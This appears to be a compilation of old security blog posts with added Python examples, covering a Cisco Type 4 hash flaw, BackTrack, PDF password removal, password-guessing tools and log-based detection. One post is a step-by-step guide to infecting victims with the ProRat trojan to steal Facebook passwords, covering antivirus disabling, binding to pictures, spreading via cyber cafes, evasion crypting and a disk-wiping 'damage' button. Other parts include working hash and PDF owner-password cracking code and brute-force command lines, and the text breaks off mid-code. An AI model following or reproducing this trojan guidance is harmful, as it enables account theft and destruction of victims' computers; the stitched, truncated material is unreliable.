
Monday, April 1, 2013

Cisco Type 4 Passwords cracked–Coding mistake endangers devices

Cisco has issued a security advisory stating that its new Type 4 password hashing algorithm is flawed, which lets Type 4 hashes be cracked easily. Type 4 was intended to replace the MD5-based Type 5 scheme: the design called for a salted hash with 1000 iterations of SHA-256 (PBKDF2). Cisco's engineers miscoded it, leaving out the salt and running a single SHA-256 iteration, which makes it weaker than the Type 5 algorithm it was meant to replace.


“This approach causes a Type 4 password to be less resilient to brute-force attacks than a Type 5 password of equivalent complexity.”



Worse, the IOS and IOS XE releases that added Type 4 support also lost the ability to generate a Type 5 hash from a plaintext password on the device, so an administrator cannot simply switch back. Talk about rubbing salt in the wound.
As per advisory -

"A device running a Cisco IOS or IOS XE release with support for Type 4 passwords lost the capability to create a Type 5 password from a user-provided plaintext password. Backward compatibility problems may arise when downgrading from a device running a Cisco IOS or IOS XE release with Type 4 password support and Type 4 passwords configured to a Cisco IOS or Cisco IOS XE release that does not support Type 4 passwords. Depending on the specific device configuration, the administrator may not be able to log in to the device or to change into privileged EXEC mode, requiring a password recovery process to be performed."
It was bound to be discovered. Philipp Schmidt and Jens Steube of the Hashcat project found the flaw while cracking a Type 4 hash posted on inetpro.org. Because a Type 4 hash is a single unsalted SHA-256, anyone who gets hold of a batch of them can test each candidate password against every hash at once and run through millions of hashes in hours.
The aftermath? Cisco says it will create a new password type, with new and as yet unannounced commands to configure it. In the meantime, Cisco says you "may" want to replace Type 4 passwords with Type 5 ones, as quoted:
There are two options to generate a Type 5 password:
  • Using another device running a Cisco IOS or Cisco IOS XE release without Type 4 support
  • Using the openssl command-line tool (part of the OpenSSL Project)
You can read the advisory here
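As an added illustration (not code from Cisco or from the Hashcat team), the Python below computes a Type 4 hash the way the shipped IOS code did, one unsalted SHA-256 pass, beside the salted PBKDF2-HMAC-SHA256 construction the advisory says was intended, and shows why the difference matters: without a salt, one table of hashed candidates cracks every captured hash at once, while with a salt every (hash, candidate) pair costs a fresh 1000-round computation. The Cisco-specific base64 alphabet, the salt size and the "salt$hash" output format of the designed variant are assumptions made for this example, not facts from the page.

```python
import base64
import hashlib
import os

# Assumption: Cisco encodes the digest with a base64 alphabet ordered
# "./0-9A-Za-z" and drops the padding (43 chars for a 32-byte SHA-256 digest).
STD_B64 = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
CISCO_B64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
_TO_CISCO = bytes.maketrans(STD_B64, CISCO_B64)


def cisco_b64(raw: bytes) -> str:
    return base64.b64encode(raw).rstrip(b"=").translate(_TO_CISCO).decode()


def type4_as_shipped(password: str) -> str:
    """What the flawed IOS code computes: SHA-256(password), no salt, one pass."""
    return cisco_b64(hashlib.sha256(password.encode()).digest())


def type4_as_designed(password: str, salt: bytes, iterations: int = 1000) -> str:
    """What the advisory says was intended: salted PBKDF2-HMAC-SHA256, 1000 rounds.
    The 'salthex$hash' layout is this example's own, not a Cisco format."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt.hex() + "$" + cisco_b64(dk)


def new_salt() -> bytes:
    return os.urandom(10)  # 80 bits; assumed salt size for the designed scheme


def crack_unsalted(hashes, wordlist):
    """No salt, one pass: hash the wordlist ONCE, then look every target up."""
    table = {type4_as_shipped(w): w for w in wordlist}
    return {h: table[h] for h in hashes if h in table}


def crack_salted(salted_hashes, wordlist, iterations=1000):
    """Salted: each target needs its own pass over the wordlist; nothing is shared.
    Returns (found, number of PBKDF2 computations spent)."""
    found, work = {}, 0
    for target in salted_hashes:
        salt = bytes.fromhex(target.split("$")[0])
        for w in wordlist:
            work += 1
            if type4_as_designed(w, salt, iterations) == target:
                found[target] = w
                break
    return found, work


if __name__ == "__main__":
    words = ["password", "cisco", "Cisco123", "enable"]
    captured = [type4_as_shipped("cisco"), type4_as_shipped("enable")]
    print("unsalted, one table lookup:", crack_unsalted(captured, words))
    salted = type4_as_designed("enable", new_salt())
    print("salted:", crack_salted([salted], words))
```

With ten thousand captured Type 4 hashes, `crack_unsalted` still hashes the wordlist only once; `crack_salted` has to do ten thousand times the work, each unit a thousand HMAC rounds, which is the whole point of the salt and the iteration count that were left out.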

Tuesday, February 14, 2012

Backtrack 4 Download for Windows VMWare & Torrents

BackTrack is a live CD Linux distribution that focuses on penetration testing. A merger of two older security-related distros — Whax and Auditor Security Collection — BackTrack bundles more than 300 security tools.

BackTrack is based on the SLAX distribution (a live CD derived from Slackware) and runs a patched 2.6.20 kernel. It offers users both KDE and Fluxbox desktop environments.
To start using BackTrack, download the ISO image and burn it to a CD. Insert the disc and boot your machine. Once booted, the system starts at runlevel 3 (text mode), where you must log in as root and choose whether to start KDE or Fluxbox or just use the terminal.

BackTrack provides clear, concise instructions for logging in, starting the window manager, and configuring the video card before you see the login prompt. If you’ve never used BackTrack before, use a graphical environment, since it will help you understand how all the included applications are organized and let you take advantage of some graphical utilities. When the window manager comes up you’ll find some ordinary desktop programs, such as Firefox, Gaim, K3b, and XMMS, within a nice environment with beautiful wallpaper and window transparency.

Don’t let the attractive appearance fool you — BackTrack packs a punch. The security tools are arranged inside a Backtrack submenu. This is a big improvement over older releases, because you can easily follow an attack methodology: starting by collecting information and ending by hiding your actions.

The tools are arranged in 12 categories, such as vulnerability identification, penetration, privilege escalation, radio network analysis, and reverse engineering. Among the more than 300 security tools you’ll find such familiar names as the Metasploit Framework, Kismet, Nmap, Ettercap, and Wireshark (previously known as Ethereal).

One of the core points of this release is the attention to detail. For example, when you choose most of the programs from the Backtrack menu, a console window opens with the output of the program’s help. Some tools have been bundled with scripts that in a few steps configure and run the program for you. For example, if you run the Snort intrusion detection application, a script asks for some passwords and then sets up MySQL, Apache, Base, and Snort itself so you can easily browse alert logs via a Web browser.

If you open Firefox or Konqueror you’ll find some useful security-oriented bookmarks. In the Documents submenu the developers have included PDF manuals for the ISSAF and OSSTMM security methodologies. There are also some tools that you wouldn’t expect inside a live CD; for example, you have a popular debugger for Windows, OllyDbg, which runs fine through Wine, so you can even debug .exe files.

If you like the live CD, you can install BackTrack to a hard drive (decompressed, it requires 2.7GB of space) or USB memory stick (compressed, 700MB) using a graphical wizard.
While BackTrack is an excellent tool, nothing is perfect. Unfortunately it doesn’t include Nessus, the popular security scanner, due to license problems. I tried to start PostgreSQL from the Services menu, but it gave an error. And it seems as if the developers forgot to update the Backtrack menu in Fluxbox, because it offers the previous version arrangement. Tools like VMware and Nessus appear on the menu but are broken links because they have been removed from this release.

Despite a few little bugs and problems, BackTrack is the best distribution I’ve found for handling security-oriented tasks out of the box.

Download Links :

Last Update: 11.01.2010
Description: Image Download
Name:: bt4-final.iso
Size: 1570 MB
MD5: af139d2a085978618dc53cabc67b9269



Description: VM Image Download
Name:: bt4-final-vm.zip
Size: 2000 MB
MD5: 733b47fad1d56d31bc63c16b3706a11c




Monday, September 5, 2011

Facebook Password Hacking Software: Download Trojans & Keyloggers

How to Hack Facebook Account Passwords Using Trojans & Keyloggers

Here I demonstrate using the ProRat trojan. You can also check the list of trojans and keyloggers I posted a few months back; use any trojan or keylogger you like, as the basic functionality of all backdoors is the same. Please note that all these hacking tools are detected by antivirus software, so you have to uninstall or disable your running antivirus first. I strongly recommend trying these trojans and keyloggers on a test system first.

Step-1: Download latest version of ProRat v1.9 Fix2. CLICK HERE to download. The ZipPass is : pro

STEP-2: Creating the ProRat server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".


STEP-3: Open Notifications. Select the second option, "Mail Notification". In the E-MAIL field you will see a mail
ID: bomberman@yahoo.com. Remove this mail ID and enter your own. You will receive a notification
email at this address whenever your victim connects to the internet from the infected system.

STEP-4: Open General settings. This tab is the most important one. Here is a quick overview of what the
check boxes mean and which should be checked.

Key:

[ ] = dont check
[x] = check

[ ] Give a Fake Error Message. (When they open the file, it shows an error message.)
[x] Melt server on install. (The dropper deletes its own file once the server has installed itself, so nothing
is left behind in the folder it was run from.)
[x] Kill AV - FW on Install. (This shuts down the anti-virus and firewall and keeps them off once installed
on the victim's computer.)
[x] Disable Windows XP SP2 security center
[x] Disable Windows XP Firewall
[x] Clear Windows XP Restore Points
[ ] Dont send LAN notifications (keeps other computers on the victim's network from knowing about you)
[ ] Protection for removing local server

In the Invisibility Box, check all 4 boxes.

STEP-5: Open Bind With File. You can bind your server/downloader server with any file you want. Click the
"Bind the server with a file" button and the file button will be activated; you can then choose a file to
bind with the server. A picture is a good choice because it is a small file and easier to send to the people
you are targeting.

STEP-6: Open Server Extensions. I prefer .exe files, because they can be crypted; most crypters don't
support .bat/.pif/.com etc. So use .exe files.

STEP-7: Open Server Icon. You can select the one you want to use with the server from the small pictures on the
menu. You can use an icon from your computer also. Press the "Choose new icon" button.

STEP-8: After this, press "Create server", your server will be in the same folder as ProRat. A new file with
name "binded_server" will be created. Rename this file to something describing the picture.

[NOTE: PLS DO NOT OPEN THE FILE "binded_server" on your system.]

STEP-9: Sending the file "binded_server" to the victim. You can send this trojan server via email or pendrive, or if
you have physical access to the system, go and run the file.

By email, you cannot send this file as it is, because it will be detected as a trojan or virus. Password-protect it
in a ZIP archive and then email it. Once your victim downloads the ZIP file, ask him to unlock it with the ZIP password. When
the victim double-clicks the file, he is under your control.

STEP-10: Connecting to the victim's computer. Once the server has been sent and the person has opened the file from the ZIP
archive, they are infected, and have no clue about it. At the top of the ProRat program you
will see a box in the upper left corner. Type in the victim's IP address and make sure the port is 5110. Now
press Connect. You should see a pop-up box asking for a password: the one you entered while creating the
server, which by default is "123456" without quotes. Note that a fixed default port and a default password cut both
ways: anyone who finds a ProRat listener on port 5110 can try the same "123456" against it.

STEP-11: Check your email (the junk folder if needed) and find the “Your victim is online” message. Copy and paste the IP
address into ProRat where it says “IP:[127.0.0.1]“. Press CONNECT; do not change the port, and if you did, change it
back to 5110. Type in the password (the default is usually 123456; it is in the email). You're done; now you can play
with the buttons in the program, especially the GIVE DAMAGE button, which damages their PC by formatting it and
makes the computer useless.

Download latest version of ProRat v1.9 Fix2. CLICK HERE to download. The ZipPass is : pro

FAQ:

Q: Error message: "Windows cannot access the specified device, path, or file. You may not have the appropriate
permissions to access the item." What do I do?
A: Simple! Delete the ProRat program. What happened is that your AV has altered the file, or it could be
malicious content. Either way, delete it. Next, remember the file you downloaded? Extract it again and
re-run it. You will not need to remake the server file if it has already been sent to the victim. Just open ProRat,
make sure your AV is shut off, and reconnect. There you go.

Q: What operating systems are supported by ProRat?
A: Windows 95/95B
Windows 98/98SE
Windows ME
Windows NT 4.0
Windows 2000
Windows XP
Windows Vista

Q: When I have downloaded ProRat, my antivirus detect it as virus. What should I do?
A: Well, since RATs are hacktools, and all the hack tools are detected as viruses, ProRat is detected as virus
also. To download and install ProRat you will need to turn off your anti-virus.

Q: What should I do after I install my server?
A: After you install your server, you should spread it. Few years back I have installed my server manually on
1000's of cyber cafe in my city. I hacked almost the entire city cafe users secret information. This is the
best way. Go to nearest cyber cafe's and manually install your trojan server.

Q: I've created a server, but I don't see it in the directory. Why?
A: That's caused by your antivirus. The server is detected, and it won't let it. I suggest you to remove your
antivirus if you are going to use RATs.

Q: I've sent my server to a friend on MSN, but he doesn't connect.
A: That's because he has an antivirus or firewall that won't let him connect to your RAT. To make it
FUD (Fully Undetectable), you should use a crypter.

Q: Is ProRat illegal?
A: No. ProRat is a legal RAT. The author of ProRat created the program for legitimate purposes, and there are
many legal uses; parents can use keyloggers to protect their children from online abuse, for example.
Some people use it for stealing passwords, credit cards and more, but it is not the software that breaks the law,
it is the person who uses it.

Q: Can ProRat be used for legitimate purposes?
A: Yes. You can monitor your children online activity.. to make sure they don't visit pornographic websites.
You can find out if someone uses your computer while you are away, ensure no one is accessing your personal
files while you are away and more.

Q: How do I make my server FUD?
A: You should use a binder or crypter. Also check the linked posts on how to make a trojan or keylogger fully undetectable by antivirus.
THIS TUTORIAL HAS BEEN CREATED WITH THE HELP OF AN UNDERGROUND HACKER flAmingw0rm. THANKS TO YOU MAN TO MAKE
THIS POSSIBLE.


Thursday, July 21, 2011

PDF Password Cracker: Download PDF Password Remover

The PDF Password Remover can be used to decrypt protected Adobe Acrobat PDF files

The PDF Password Remover is a useful and reliable program which can be used to decrypt protected Adobe Acrobat PDF files that have an "owner" password set, preventing the file from being edited (changed), printed, or having its text and graphics selected.

Decryption is instantaneous. The decrypted file can be opened in any PDF viewer (e.g. Adobe Acrobat Reader) without any restrictions, i.e. with the edit/copy/print functions enabled. All versions of Adobe Acrobat (including 7.x, which uses 128-bit encryption) are supported.

The standard security handler in PDF uses two different passwords with two different jobs: the 'user password' and the 'owner password'.

A PDF document may require a password to be opened (the 'user' password), and the document may also specify operations that remain restricted even after it has been decrypted: printing; copying text and graphics out of the document; modifying the document; and adding or modifying text notes and AcroForm fields (governed by the 'owner' password). The catch is that these restrictions are enforced by the viewer, not by the cryptography: the content encryption key is derived from the user password, which is empty when only an owner password is set, so a tool that simply ignores the permission flags can decrypt the file without ever knowing the owner password.

Limitation:
Please note that PDF Password Remover does not work on documents that have a 'user' password (one that prevents the file from being opened at all). The tool has to be able to open the file, so if the user password is set and unknown, PDF Password Remover will fail.

Here are some key features of "PDF Password Remover":
  • Easy to use
  • Supports drag and drop of PDF files
  • Does not need Adobe Acrobat software
  • Removes the security settings from an encrypted PDF file instantly
  • Supports command line operation (for manual use or inclusion in scripts)
  • Supports the PDF 1.6 format (formerly only supported by the Acrobat 7.0 application)
  • Supports PDF 1.6 (Acrobat 7.x) files, including 40-bit RC4 decryption, 128-bit RC4 decryption, compressed files and unencrypted metadata
  • Batch operation on many files from the command line
  • Supports Adobe Standard 40-bit Encryption and Adobe Advanced 128-bit Encryption
  • Decrypts protected Adobe Acrobat PDF files, removing restrictions on printing, editing and copying

Network Logon Cracker: THC-Hydra

A very fast network logon cracker which supports many different services.
Currently this tool supports:

TELNET, FTP, Firebird, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTPS-HEAD, HTTP-PROXY, HTTP-PROXY-NTLM, HTTP-FORM-GET, HTTP-FORM-POST, HTTPS-FORM-GET, HTTPS-FORM-POST, LDAP2, LDAP3, SMB, SMBNT, MS-SQL, MYSQL, POSTGRES, POP3-NTLM, IMAP, IMAP-NTLM, NCP, NNTP, PCNFS, ICQ, SAP/R3, Cisco auth, Cisco enable, SMTP-AUTH, SMTP-AUTH-NTLM, SSH2, SNMP, CVS, Cisco AAA, REXEC, SOCKS5, VNC, POP3 and VMware Auth.

Changelog for 5.7:

* Added ncp support plus minor fixes (by David Maciejak @ GMAIL dot com)
* Added an old patch to fix a memory from SSL and speed it up too from kan(at)dcit.cz
* Removed unnecessary compiler warnings
* Enhanced the SSH2 module based on an old patch from aris(at)0xbadc0de.be
* Fixed small local defined overflow in the teamspeak module. Does it still work anyway??

Download Free FSCRACK: GUI for John the Ripper password cracker

FSCrack is a front end for John the Ripper (JtR) that provides a graphical user interface (GUI) for access to most of JtR’s functions.

JtR is described as follows (from http://www.openwall.com/john/): "John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt (3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches."

System Requirements
  • John the Ripper binary (win32) written by Solar Designer. Available at http://www.openwall.com/john/
  • .Net framework 2.0. Available at: http://msdn.microsoft.com/netframework/downloads/updates/default.aspx
  • (Optional) NTLM (MD4) hash support patch written by Olle Segerdahl. Available at: http://olle.nxs.se/software/john-ntlm/

SOURCE: http://www.foundstone.com

Hack Adobe Acrobat PDF Password | How to Decrypt Adobe Acrobat PDF Files: Download PDF Decrypter

PDF Decrypter v2.50 | 6MB

PDF Decrypter 2.5 can be used to decrypt protected Adobe Acrobat PDF files which have an “owner” password set, preventing the file from being edited, printed, or having its text and graphics selected. It is a fast, affordable way to decrypt a large number of protected PDF files in one run, saving you time. Its easy-to-use interface lets you decrypt PDF files with a few clicks.

The decrypted file can be opened in any PDF viewer (e.g. Adobe Acrobat Reader). All versions of Adobe Acrobat PDF (including 7.x, which uses 128-bit encryption) are supported, and PDF Decrypter 2.5 does not need any other software such as Adobe Acrobat.
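To show why an owner-only password is no barrier for tools like PDF Password Remover and PDF Decrypter, here is an added Python example (not code from either product) that implements the RC4 algorithms of the PDF standard security handler as given in the PDF Reference (Algorithms 2 through 5 for revisions 2 and 3): it derives the content key from an empty user password without ever touching the owner password, and then recovers the owner password itself by running Algorithm 3 backwards over a wordlist, since RC4 is its own inverse. The document ID, permission bits, owner password and candidate list are constructed for the demo.

```python
import hashlib
import struct

# 32-byte padding string from the PDF Reference (standard security handler).
PAD = bytes.fromhex("28BF4E5E4E758A4164004E56FFFA01082E2E00B6D0683E802F0CA9FE6453697A")


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4; the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def pad_pw(pw: bytes) -> bytes:
    return (pw + PAD)[:32]


def xor_key(key: bytes, i: int) -> bytes:
    return bytes(b ^ i for b in key)


def owner_key(owner_pw, user_pw, rev, n):
    """Algorithm 3 steps a-d: the RC4 key under which /O is encrypted."""
    h = hashlib.md5(pad_pw(owner_pw or user_pw)).digest()
    if rev >= 3:
        for _ in range(50):
            h = hashlib.md5(h).digest()
    return h[:n]


def compute_o(owner_pw, user_pw, rev, n):
    """Algorithm 3: /O is the padded USER password, RC4-encrypted under owner_key."""
    key = owner_key(owner_pw, user_pw, rev, n)
    o = rc4(key, pad_pw(user_pw))
    if rev >= 3:
        for i in range(1, 20):
            o = rc4(xor_key(key, i), o)
    return o


def file_key(user_pw, o, p, doc_id, rev, n):
    """Algorithm 2: the content key depends on the USER password only."""
    m = hashlib.md5(pad_pw(user_pw))
    m.update(o)
    m.update(struct.pack("<I", p & 0xFFFFFFFF))  # /P as unsigned 32-bit little-endian
    m.update(doc_id)
    h = m.digest()
    if rev >= 3:
        for _ in range(50):
            h = hashlib.md5(h[:n]).digest()
    return h[:n]


def compute_u(key, doc_id, rev):
    """Algorithms 4 (R2) and 5 (R3): /U, which a reader uses to check the user password."""
    if rev == 2:
        return rc4(key, PAD)
    u = rc4(key, hashlib.md5(PAD + doc_id).digest())
    for i in range(1, 20):
        u = rc4(xor_key(key, i), u)
    return u + b"\x00" * 16


def user_pw_ok(user_pw, o, u, p, doc_id, rev, n):
    key = file_key(user_pw, o, p, doc_id, rev, n)
    cmp_len = 32 if rev == 2 else 16
    return compute_u(key, doc_id, rev)[:cmp_len] == u[:cmp_len]


def recover_owner_pw(o, user_pw, rev, n, candidates):
    """Algorithm 3 backwards: decrypt /O under each candidate owner password and
    look for the known padded user password."""
    target = pad_pw(user_pw)
    for cand in candidates:
        key = owner_key(cand, user_pw, rev, n)
        x = o
        if rev >= 3:
            for i in range(19, 0, -1):
                x = rc4(xor_key(key, i), x)
        if rc4(key, x) == target:
            return cand
    return None


# Constructed document: revision 3, 128-bit RC4, owner password set, EMPTY user
# password, /P forbidding print/copy/modify. ID and passwords are made up.
REV, N = 3, 16
DOC_ID = bytes.fromhex("0123456789abcdef0123456789abcdef")
P = -3904
OWNER_PW, USER_PW = b"s3cret-owner", b""
O = compute_o(OWNER_PW, USER_PW, REV, N)
KEY = file_key(USER_PW, O, P, DOC_ID, REV, N)  # no owner password involved
U = compute_u(KEY, DOC_ID, REV)

if __name__ == "__main__":
    print("content key from empty user password:", KEY.hex())
    print("owner password:", recover_owner_pw(O, USER_PW, REV, N, [b"pass", b"owner", OWNER_PW]))
```

`KEY` is everything needed to decrypt every stream in the file; a "remover" just decrypts with it and writes the document back out without an /Encrypt dictionary. Recovering the owner password is a bonus: for revision 2 it costs one MD5 and one 32-byte RC4 per candidate, which is why 40-bit owner passwords fall to a wordlist in seconds.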


Password guessing Countermeasures

  • Block access to TCP and UDP ports 135–139.

  • Disable NetBIOS (WINS client) bindings on any adapter that does not need them.

  • Use complex passwords

  • Audit failed logon attempts in the Event Viewer Security log: event ID 529 (logon failure: unknown user name or bad password) and 539 (account locked out), both in the Logon/Logoff category.

Monitoring Event Viewer Logs
  • Logging is of no use if no one ever analyzes the logs

  • VisualLast from www.foundstone.com presents the event logs visually

VisualLast is the advanced version of NTLast with a number of additional features. It lets network administrators view and report individual users' logon and logoff times, and the events can be searched by time frame, which is invaluable to security analysts looking for intrusion details.
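As an added example (not part of the original post, and not VisualLast), the Python below reads a constructed, simplified tab-separated export of the Security log and applies the detection the bullet points imply: a burst of event 529 from one source network address inside a short window is a guessing attack, and every 539 is a lockout worth a look. The log lines, column layout, threshold and window are all made up for the demonstration.

```python
import csv
import io
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed, simplified Security-log export (tab-separated):
# time, audit type, event ID, user name, workstation, source network address.
SAMPLE_LOG = """\
2011-09-05 10:00:01\tFailure Audit\t529\tadministrator\tWKS-ATTACK\t10.0.0.99
2011-09-05 10:00:02\tFailure Audit\t529\tadministrator\tWKS-ATTACK\t10.0.0.99
2011-09-05 10:00:03\tFailure Audit\t529\tadministrator\tWKS-ATTACK\t10.0.0.99
2011-09-05 10:00:04\tFailure Audit\t529\tbackup\tWKS-ATTACK\t10.0.0.99
2011-09-05 10:00:05\tFailure Audit\t529\tguest\tWKS-ATTACK\t10.0.0.99
2011-09-05 10:00:06\tFailure Audit\t529\ttest\tWKS-ATTACK\t10.0.0.99
2011-09-05 10:00:07\tFailure Audit\t539\tadministrator\tWKS-ATTACK\t10.0.0.99
2011-09-05 10:15:00\tFailure Audit\t529\tjsmith\tJSMITH-PC\t10.0.1.20
2011-09-05 10:15:30\tSuccess Audit\t528\tjsmith\tJSMITH-PC\t10.0.1.20
2011-09-05 11:00:00\tFailure Audit\t529\tjsmith\tJSMITH-PC\t10.0.1.20
"""

FIELDS = ("time", "type", "event_id", "user", "workstation", "source")
BAD_PASSWORD, LOCKED_OUT = 529, 539


def parse_events(text):
    """Turn the export into dicts; malformed rows are skipped rather than fatal."""
    events = []
    for row in csv.reader(io.StringIO(text), delimiter="\t"):
        if len(row) != len(FIELDS):
            continue
        ev = dict(zip(FIELDS, row))
        ev["time"] = datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S")
        ev["event_id"] = int(ev["event_id"])
        events.append(ev)
    return events


def detect_guessing(events, threshold=5, window=timedelta(minutes=5)):
    """One alert per source that logs >= threshold 529s inside `window`,
    plus an alert for every 539, the lockout a guesser tends to cause."""
    alerts = []
    recent = defaultdict(deque)  # source -> timestamps of its recent 529s
    already_flagged = set()
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["event_id"] == LOCKED_OUT:
            alerts.append(("lockout", ev["source"], ev["user"]))
        if ev["event_id"] != BAD_PASSWORD:
            continue
        q = recent[ev["source"]]
        q.append(ev["time"])
        while q and ev["time"] - q[0] > window:  # slide the window forward
            q.popleft()
        if len(q) >= threshold and ev["source"] not in already_flagged:
            already_flagged.add(ev["source"])
            alerts.append(("guessing", ev["source"], len(q)))
    return alerts


def targeted_accounts(events, source):
    """Which accounts a source tried; many distinct names means spraying the list above."""
    return sorted({e["user"] for e in events
                   if e["source"] == source and e["event_id"] == BAD_PASSWORD})


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    for alert in detect_guessing(evs):
        print(alert)
    print("accounts tried from 10.0.0.99:", targeted_accounts(evs, "10.0.0.99"))
```

The user who mistypes a password once at 10:15 and again at 11:00 never trips the threshold; the source that tries four accounts in six seconds does, and the 539 that follows confirms it. The source address is only present for network logons (logon type 3), so a real parser should fall back to the workstation name when it is blank.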

---Regards,
Amarjit Singh

Password Guessing

  • Password guessing attacks can be carried out manually or via automated tools.
  • Password guessing can be performed against all types of Web Authentication

  • The common passwords used are:
    root, administrator, admin, operator, demo, test, webmaster, backup, guest, trial, member, private, beta, [company_name] or [known_username]
    Passwords are the principal means of authenticating users on the Web today. It is imperative that any Web site guard the passwords of its users carefully. This is especially important because users, faced with many Web sites requiring passwords, tend to reuse passwords across sites, so the compromise of one password completely compromises the user.

    Attack Methods
    Often Web sites advise users to choose memorable passwords such as birthdays, names of friends or family, or social security numbers. This is extremely poor advice, as such passwords are easily guessed by an attacker who knows the user. The most common way an attacker will try to obtain a password is through the dictionary attack. In a dictionary attack, the attacker takes a dictionary of words and names and tries each one to see if it is the required password. This can be automated with programs that can guess hundreds or thousands of words per second, which makes it easy for attackers to try variations: the word backwards, different capitalization, a digit added to the end, and popular passwords.

    Another well-known form of attack is the hybrid attack. A hybrid attack adds numbers or symbols to the dictionary words to crack a password. Often people change their passwords by simply adding a number to the end of their current password. The pattern usually takes this form: first month the password is "site"; second month it is "site2"; third month it is "site3"; and so on. A brute force attack is the most comprehensive form of attack, though it may often take a long time to work depending on the complexity of the password; some brute force attacks can take a week or more.

    Hacking Tool: WebCracker
    • WebCracker is a simple tool that takes text lists of usernames and passwords and uses them as dictionaries to implement Basic authentication password guessing.
    • It keys on an "HTTP 302 Object Moved" response to indicate a successful guess.
    • It will report every successful username/password pair found in the lists.
    WebCracker lets the user test a restricted-access website by trying ID and password combinations against it. The program exploits a rather large hole in web site authentication: password-protected websites can easily be brute-forced if there is no limit on the number of times an incorrect password or user ID can be tried.
    Hacking Tool: Brutus

    • Brutus is a generic password guessing tool that cracks various authentication types.
    • Brutus can perform both dictionary attacks and brute-force attacks where passwords are generated from a given character set.
    • Brutus can crack the following authentication types:
    • HTTP (Basic authentication, HTML Form/CGI); POP3; FTP; SMB; Telnet

    Brutus is an online or remote password cracker. More specifically it is a remote interactive authentication agent. Brutus is used to recover valid access tokens (usually a username and password) for a given target system. Examples of a supported target system might be an FTP server, a password protected web page, a router console a POP3 server etc. It is used primarily in two ways:
    • To obtain the valid access tokens for a particular user on a particular target.
    • To obtain any valid access tokens on a particular target where only target penetration is required.
    Brutus does very weak target verification before starting; in fact all it does is connect to the target on the specified port. In the context of Brutus, the target usually provides a service that allows a remote client to authenticate against the target using client supplied credentials. The user can define the form structure to Brutus of any given HTML form. This will include the various form fields, any cookies to be submitted in requests, the HTTP referrer field to send (if any) and of course the authentication response strings that Brutus uses to determine the outcome of an authentication attempt.

    If Brutus can successfully read forms of the fetched HTML page then each form will be interpreted and the relevant fields for each form will be displayed. Any cookies received during the request will also be logged here. Brutus handles each authentication attempt as a series of stages, as each stage is completed the authentication attempt is progressed until either a positive or negative authentication result is returned at which point Brutus can either disconnect and retry or loop back to some stage within the authentication sequence.

    Hacking Tool: ObiWan

    • ObiWaN is a powerful Web password cracking tool. It can work through a proxy.
    • ObiWaN uses wordlists and variations of numeric or alphanumeric characters as candidate passwords.
    • Since web servers allow unlimited requests, breaking into a server is only a question of time and bandwidth.
    ObiWaN stands for "Operation burning insecure Web server against Netscape". It is now called Project 2068, after RFC 2068, which describes the HTTP/1.1 protocol; section 11.1 of that RFC describes the basic authentication scheme. This is the most widely used authentication scheme for web servers and the one ObiWaN targets.

    Web servers with a simple challenge-response authentication mechanism mostly have no settings for intruder lockout or delay timings after wrong passwords. Every user with an HTTP connection to a host using basic authentication can try username/password combinations for as long as they like, so an attacker can prod the system indefinitely.
    Like programs for UNIX system passwords (crack) or NT passwords (L0phtCrack), ObiWaN uses wordlists and variations of numeric or alphanumeric characters as candidate passwords. Since web servers allow unlimited requests, breaking in is a question of time and bandwidth. The simplest way is to run ObiWaN with a wordlist. The following example tries to crack the username eccouncil on the host intranet.
    ./ObiWaN -h intranet -a eccouncil -w list.txt 
    To run it with alphanumeric variation with a depth of 2
    ./ObiWaN -h intranet -a eccouncil -w list.txt -A 2 
    To run it in brute force loop mode
    ./ObiWaN -h intranet -a eccouncil -w list.txt -b 6 -B 8 
    Hacking Tool: Munga Bunga

    Munga Bunga's HTTP Brute Forcer is a utility that uses the HTTP protocol to brute-force any login mechanism that requires a username and password on a web page (an HTML form). To recap: a password often contains only letters, so the character set holds 26 or 52 characters depending on whether one or both cases are used. Some systems make no difference between lower-case and upper-case letters (the LAN Manager hash, for example, upper-cases the password before hashing it). For an 8-character password the difference is a factor of 2^8 = 256, which is significant.

    The brute force method can be very effective when combined with the program's other functionality. Munga Bunga can be used for breaking into emails, affiliate programs, web sites and any web-based accounts, and for launching DoS attacks and flooding emails, forms and databases, though DoS attacks and flooding are not supported or documented in the documentation. Apart from this, the attacker can write definition files. These are files with the .def extension that contain information about a particular server and the data to submit to it. They are used to extend the capability of the program based on the user's own definitions. The software comes bundled with some definition

    The tool claims to be capable of brute forcing anything that can be entered via an HTML form with a password and username. The attack methodology is as follows: the attacker supplies a password file so the program can attempt to enter the account(s) with the specified passwords. In addition, he can write a definition file for the form he wants to crack.
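The logic the tools above automate (Hydra, WebCracker, Brutus and ObiWaN against Basic authentication; Brutus and Munga Bunga against HTML forms), as an added Python example rather than any of those tools' code. It starts a throwaway target on localhost that accepts one constructed credential pair both on a Basic-auth realm and on a login form, then guesses against each, keying on the 401-versus-2xx distinction for Basic and on the 302 a successful form login returns, which is exactly the signal WebCracker keys on. The URL paths, form field names and credentials are assumptions for the demo.

```python
import base64
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed target: the one valid credential pair, shared by the Basic-auth
# realm at /basic and the login form at /login (both paths are assumptions).
VALID = {"admin": "admin123"}


class Target(BaseHTTPRequestHandler):
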